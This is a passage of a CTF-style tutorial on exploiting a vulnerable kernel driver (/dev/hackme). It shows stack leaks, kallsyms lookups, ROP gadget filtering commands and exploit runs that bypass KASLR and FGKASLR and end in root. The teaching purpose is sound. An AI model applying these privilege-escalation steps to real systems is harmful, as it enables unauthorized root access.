< [+] offset 11 contains value: 0xffffffffa5749a47
< [+] offset 12 contains value: 0xffff981606caef00
---
> [+] offset 6 contains value: 0xffff97ae86cae600
> [+] offset 7 contains value: 0xffffa424c01bfef0
> [+] offset 8 contains value: 0xffff97ae86cae600
> [+] offset 9 contains value: 0xffffa424c01bfe80
> [+] offset 10 contains value: 0xffffffff8fd3d9c7
> [+] offset 11 contains value: 0xffffffff8fd3d9c7
> [+] offset 12 contains value: 0xffff97ae86cae600
17,19c17,19
< [+] offset 14 contains value: 0x7ffeda3ac880
< [+] offset 15 contains value: 0xffffaa5a001bfea0
< [+] offset 16 contains value: 0xcd9ac705e3874700
---
> [+] offset 14 contains value: 0x7ffe51038100
> [+] offset 15 contains value: 0xffffa424c01bfea0
> [+] offset 16 contains value: 0x310671060c9fe500
....
We can see, that some addresses are similar in both runs. E.g., on
offset 15 we had 0xffffaa5a001bfea0
and 0xffffa424c01bfea0
. The
last three and a half bytes are the same: 01bfea0
.
If we squint hard enough, we can also see which lines are the same in
both files.
Another approach is using the comm
command, which gives us immediately
the lines that are the same in both files, but unfortunately only
works on sorted inputs.
$ comm -12 <(sort stack1.txt) <(sort stack2.txt)
[*] trying to leak up to 320 bytes memory
[+] offset 1 contains value: 0x2a
[+] offset 13 contains value: 0x0
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 29 contains value: 0x0
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 39 contains value: 0x0
[+] offset 5 contains value: 0x4
[+] successfully opened /dev/hackme
Here, we see that all values that stay the same are parameters and not addresses.
If we leak more values from the stack, we learn some more values that are similar between different runs. In particular we are interested in offsets that start with the same value. The idea is that the leaked values describe the randomized base address added to a fixed offset. As the fixed offset is the same across multiple runs, we can compute the address of valuable functions, if we know their distance to a leaked value, as the distance stays the same.
How do we know if a function is valuable? We can search for it in
/proc/kallsyms
and if it corresponds to a symbol, it may be
valuable, as we can compute offsets from that symbol.
As an example, if we set the lower two bytes of the value at the stack offset 38 to zero, we arrive at the base address of the kernel.
/ # ./leak_stack | grep 38
[+] offset 38 contains value: 0xffffffffa680a157
/ # grep ffffffffa6800000 /proc/kallsyms
ffffffffa6800000 T _text
ffffffffa6800000 T startup_64
ffffffffa6800000 T _stext
Another useful stack leak is at offset 41. Setting the lower bytes to zero yields again the address of a symbol in the kernel table.
/ # ./leak_stack | grep 41
[+] offset 41 contains value: 0xffffffffa6a0008c
[+] offset 53 contains value: 0x417421
[+] offset 58 contains value: 0x417421
/ # grep ffffffffa6a00000 /proc/kallsyms
ffffffffa6a00000 T native_usergs_sysret64
ffffffffa6a00000 T __entry_text_start
Note that we could now start to rebuild our ROP chain, by computing the base address of the kernel from the stack offset 38. The addresses of the ROP gadgets can then be computed by their offset from the kernel base address. For the old implementation of ASLR, i.e. for KASLR that is not FGKASLR this works.
We need to set nofgkaslr
in run.sh
.
Then, the following code implements the attack on simple KASLR that
only adds a random offset to the kernel base address.
Executing this code yields the following:
/ $ ./exploit_kaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x7db22304978a2500 at offset 16
[+] leaked kernel_base 0xffffffffb3a00000
[+] leaked prepare_kernel_cred 0xffffffffb3ec67f0
[+] leaked ksymtab_commit_creds 0xffffffffb3ec6410
[+] we are root (uid = 0)
The next step is dealing with full FGKASLR. Thus, the randomization takes place on the granularity of functions.
Comparing Addresses of Kernel Symbols
After investigating the stack, let us now compare the location of
kernel symbols for different runs.
For this, we need to modify initramfs/etc/inittab
to give us a root shell so we
can access /proc/kallsyms
.
We execute run.sh
and then take a look at /proc/kallsyms
.
For this, we needed to increase the size of the scroll buffer of
bash
so we could simply cat /proc/kallsyms
and copy the output.
Then, we did this again.
Comparing the locations of the kernel symbols for these two runs,
e.g., using vimdiff
shows that FGKASLR does not apply to the whole
kernel space.
Below we see an excerpt of the first run.
ffffffffa7200000 T _text
...
ffffffffa7600dc6 T __x86_retpoline_r15
ffffffffa7600de0 T pm_wakeup_source_sysfs_add
...
And here is an excerpt of the second run.
ffffffff83e00000 T _text
...
ffffffff84200dc6 T __x86_retpoline_r15
ffffffff84200de0 T agp_bind_memory
...
For the section between _text
and __x86_retpoline_r15
, we see that
only the three bytes after ffffffff
are different. The order of the
symbols and also their relative distances are the same. Hence, this is
only affected by KASLR, but not FGKASLR.
The length of this area is ffffffff84200dc6 - ffffffff83e00000 = 400dc6
.
Later, the order of functions is randomized. This is where FGKASLR is applied.
What is not shown in the excerpt is that even later, starting from the
symbol __start_rodata
to the end, again only KASLR is applied.
However, as suggested by the name, this section contains read-only
data and hence cannot be directly used for the construction of ROP
gadgets as it is not executable. However, it contains structs such as
ksymtab
which can be used to calculate addresses.
As an example both functions prepare_kernel_cred
and commit_creds
are in the section randomized using FGKASLR. Hence, we cannot compute
their offsets, given the kernel base address naively. But within
ksymtab there are the structs __ksymtab_prepare_kernel_cred
and
__ksymtab_commit_creds
.
These are defined as follows.
If we add the value_offset
to the address of the entry symbol, then
we find the actual symbol. Thus, we can compute the addresses of
prepare_kernel_cred
and commit_creds
using an appropriate ROP
chain, even though these symbols reside in the memory area using
FGKASLR.
Further, if we take a look at the ROP gadgets that we used previously,
we see that all of them reside in the KASLR section, except
for mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203;
that resides in
the FGKASLR section.
We can filter for gadgets in the correct section using
ROPGadget (pip install ROPGadget
)
with ROPgadget --binary ./vmlinux --range
0xffffffff81000000-0xffffffff81400dc6
.
Or using ropr (cargo install
ropr
)
with ropr --range "0xffffffff81000000-0xffffffff81400dc6" ./vmlinux
As we know that without KASLR a kernel is loaded at 0xffffffff81000000
, we
can quickly compute the offsets. As an example, in the previous
exploit using a signal for the KPTI bypass, we had the following ROP
gadget.
With KASLR, this becomes the following.
Leaking the Addresses of prepare_kernel_cred
and commit_cred
For our exploit we need the addresses of the functions prepare_kernel_cred
and commit_cred
.
Unfortunately for us, both of these symbols are in a section of the kernel that is affected by FGKASLR.
Hence, we cannot compute their addresses in the kernel by adding a fixed offset
to the kernel base.
However, we already saw that there is a section at the end of the kernel
memory containing read-only data whose addresses are randomized using only ASLR and not KASLR.
This section contains the structs __ksymtab_prepare_kernel_cred
and
__ksymtab_commit_creds
whose addresses we could compute.
From these, we can compute the addresses of prepare_kernel_cred
and commit_cred
.
So let us start to access __ksymtab_prepare_kernel_cred
and
__kstrtab_commit_creds
by adding their offsets to the kernel base address.
For this, we modified the function leak_cookie()
as follows:
Running this yields the real addresses
of the symbols, as can be shown when contrasting with the true
location within /proc/kallsyms
.
/ # ./leak_cookie
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xaec7370351852800
[+] leaked kernel_base 0xffffffffbd600000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffbe58d4fc
[+] leaked ksymtab_commit_creds 0xffffffffbe587d90
/ # cat /proc/kallsyms | grep ffffffffbe58d4fc
ffffffffbe58d4fc r __ksymtab_prepare_kernel_cred
/ # cat /proc/kallsyms | grep ffffffffbe587d90
ffffffffbe587d90 r __ksymtab_commit_creds
What remains is to compute the location of
prepare_kernel_cred
from __ksymtab_prepare_kernel_cred
and the location of commit_creds
from
__kstrtab_commit_creds
.
Remember that the kernel symbols structs are defined as follows:
Hence, we can now use a ROP gadget to store ksymtabs_commit_creds - 0x10
in rax, read the value_offset
, and hence obtain the memory location
of commit_creds
by adding the value_offset
to the location of
ksymtabs_commit_creds
.
The full code to compute the memory location of commit_creds
is as follows.
Executing this yields the following.
/ # ./leak_commit_creds
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xbde6cd8832184c00
[+] leaked kernel_base 0xffffffffb3000000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffffb3f8d4fc
[+] leaked ksymtab_commit_creds 0xffffffffb3f87d90
[+] leaked commit_creds 0xb385a200
Segmentation fault
This is the true location of the symbol commit_creds
as we can easily verify.
/ # cat /proc/kallsyms | grep b385a200
ffffffffb385a200 T commit_creds
The memory location of prepare_kernel_cred
can be retrieved similarly.
Game Plan
After showing these building blocks, we can now stitch together the
complete game plan for exploiting the kernel driver with FGKASLR.
We can leak enough values of the stack to get the base address of the
kernel at offset 38.
Then, we can craft a ROP chain with gadgets in the memory area that is
only affected by KASLR, but not by FGKASLR.
This ROP chain reads the kernel symbol table entries in the read-only data
section of kernel memory. The offsets of these entries can again be
computed, as they are at a constant offset of the kernel base address and
are not affected by FGKASLR, but again only by KASLR.
We use these entries to read the address of the functions
prepare_kernel_cred
and commit_creds
. Even though these functions
are in the memory area affected by FGKASLR, we can know their
addresses, as they are stored in the kernel symbol table.
Then, we need to execute prepare_kernel_cred
and commit_creds
as
before and should be presented with a root shell.
What remains is to circumvent the need for a gadget that moves the
result from prepare_kernel_cred
to commit_cred
, i.e., from rax to
rdx.
Previously, we had a gadget for this, but it is in the section
affected by FGKASLR and hence not available anymore.
Complete Code
We will now present the complete code for the exploit using FGKASLR.
Executing the code looks as follows.
/ $ id
uid=1000 gid=1000 groups=1000
/ # ./exploit_fgkaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xc2f94f03356f4600
[+] leaked kernel_base 0xffffffff86e00000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffff87d8d4fc
[+] leaked ksymtab_commit_creds 0xffffffff87d87d90
[+] leaked commit_creds 0xffffffff874ef630
[+] leaked prepare_kernel_cred 0xffffffff8791bd70
[+] returned creds_struct 0xffff93cd472e1780
[+] we are root (uid = 0)
Conclusion/Summary
That was a long article. Congrats if you made it this far. If you skipped some parts, or forgot the start of the article, here are the most important points, that should stick with you.
In general, in kernel space you cannot pop shellcode. You want to
execute commit_creds(prepare_kernel_cred(0))
and return back to user
space. This gives you an elevated prompt.
If you encounter SMEP (Supervisor Mode Execution Prevention) or SMAP (Supervisor Mode Access Prevention) you cannot use code from user space in kernel exploits. What you need to do to bypass it, is to write a ROP chain with gadgets in the kernel.
If you encounter KPTI (Kernel Page Table Isolation) there are various bypasses. The most common one is to make use of a KPTI trampoline. This is the code that syscalls execute when they go back to user space. You can find the other bypasses above in the article.
Finally, if you encounter Kernel ASLR (Address Space Layout Randomization) you need to check if it is on the granularity of functions or if the whole kernel is moved by an offset. In the second case, a single kernel address leak is enough to recover all addresses. If FGKASLR is used, there are still parts of the kernel that are only moved by a static offset. Again using a kernel address leak allows to construct ROP chains using these memory locations
Resources
There are lots of writeups for exactly this challenge and i have read multiple of them, as they focus on different aspects. Some code parts are lifted from these other writeups. Without these writeups my guide could not have existed. We really stand on the shoulders of giants.
- https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/
- https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/
- https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
- https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/
- https://hxp.io/blog/81/hxp-CTF-2020-kernel-rop/
- https://blog.wohin.me/posts/linux-kernel-pwn-01/